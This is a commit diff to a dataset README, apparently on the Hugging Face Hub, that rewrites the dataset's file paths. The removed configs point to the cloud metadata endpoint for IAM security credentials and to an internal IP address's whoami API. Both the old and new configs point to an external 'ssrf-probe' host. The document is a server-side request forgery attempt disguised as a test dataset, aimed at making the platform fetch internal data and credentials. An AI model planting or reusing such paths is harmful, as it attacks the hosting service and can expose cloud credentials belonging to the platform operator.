FIRSTACCOUNT69 commited on
Commit
91fa70f
·
verified ·
1 Parent(s): 904942e

Use CSV endpoint

Browse files
Files changed (1) hide show
  1. README.md +2 -10
README.md CHANGED
@@ -4,17 +4,9 @@ dataset_info:
4
  - name: text
5
  dtype: string
6
  configs:
7
- - config_name: probe
8
  data_files:
9
  - split: train
10
- path: "https://FIRSTACCOUNT69-ssrf-probe.hf.space/log?ssrf-csv-test.csv"
11
- - config_name: metadata
12
- data_files:
13
- - split: train
14
- path: "http://169.254.169.254/latest/meta-data/iam/security-credentials.csv"
15
- - config_name: internal_api
16
- data_files:
17
- - split: train
18
- path: "http://10.0.249.207/api/whoami-v2.jsonl"
19
  ---
20
  # Test Dataset
 
4
  - name: text
5
  dtype: string
6
  configs:
7
+ - config_name: default
8
  data_files:
9
  - split: train
10
+ path: "https://FIRSTACCOUNT69-ssrf-probe.hf.space/data.csv"
 
 
 
 
 
 
 
 
11
  ---
12
  # Test Dataset